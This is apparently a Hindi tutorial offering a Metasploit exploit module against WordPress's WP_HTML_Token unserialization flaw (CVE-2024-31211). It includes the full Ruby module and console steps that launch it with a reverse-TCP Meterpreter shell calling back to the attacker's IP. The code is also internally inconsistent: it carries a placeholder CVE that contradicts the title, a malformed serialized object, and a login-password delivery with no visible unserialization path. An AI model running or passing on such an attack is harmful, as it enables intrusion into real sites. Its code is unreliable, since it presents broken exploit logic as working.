
Metasploit मॉड्यूल जो WP_HTML_Token में WordPress unserialization भेद्यता (CVE-2024-31211) का शोषण करके दूरस्थ कोड निष्पादन प्राप्त करता है।
WP_HTML_Token वर्ग के इंस्टेंसेस के अनसीरियलाइज़ेशन के माध्यम से वर्डप्रेस में RCE कमजोरी का शोषण करने वाला मेटास्प्लॉइट मॉड्यूल बनाने के लिए, हम एक पेलोड तैयार करने पर ध्यान केंद्रित करेंगे जो अनसीरियलाइज़ेशन दोष को ट्रिगर करता है, जिससे मनमाना कोड निष्पादन होता है।
निम्नलिखित कोड को अपने मेटास्प्लॉइट फ्रेमवर्क इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में wordpress_wp_html_token_rce.rb के रूप में सहेजें।
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability in WordPress via
the unserialization of instances of the `WP_HTML_Token` class. This allows for
code execution via its `__destruct()` magic method.
},
'Author' =>
[
'Your Name' # OneArch
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-XXXX'], # Replace with the correct CVE number
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress <= 5.x', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
}
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
})
if res && res.code == 200 && res.body.include?('wp-login.php')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload to trigger unserialization vulnerability")
serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'
post_data = {
'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
'user_pass' => serialized_payload,
'wp-submit' => 'Log In',
'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
'testcookie' => 1
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
'vars_post' => post_data
})
handler
end
end
मॉड्यूल सहेजें:
मॉड्यूल को अपने मेटास्प्लॉइट फ्रेमवर्क इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में wordpress_wp_html_token_rce.rb के रूप में सहेजें।
/path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
मेटास्प्लॉइट लोड करें: एक टर्मिनल खोलकर और निम्नलिखित चलाकर मेटास्प्लॉइट फ्रेमवर्क शुरू करें:
msfconsole
नए मॉड्यूल का उपयोग करें: मेटास्प्लॉइट कंसोल में, निम्नलिखित कमांड का उपयोग करके नए एक्सप्लॉइट मॉड्यूल को लोड करें:
use exploit/multi/http/wordpress_wp_html_token_rce
कॉन्फ़िगर करें और चलाएँ:
RHOSTS, RPORT, TARGETURI, और PAYLOAD जैसे आवश्यक विकल्प सेट करें। फिर मॉड्यूल चलाएँ।
msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
LHOST => your_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
यह मेटास्प्लॉइट मॉड्यूल एक कमजोर वर्डप्रेस इंस्टेंस पर एक क्राफ्टेड सीरियलाइज्ड पेलोड भेजता है, जो अनसीरियलाइज़ेशन कमजोरी को ट्रिगर करने और मनमाना कोड निष्पादन प्राप्त करने का प्रयास करता है। कमजोरी की विशिष्ट प्रकृति और लक्ष्य वातावरण के आधार पर पेलोड और मॉड्यूल को आवश्यकतानुसार समायोजित करें।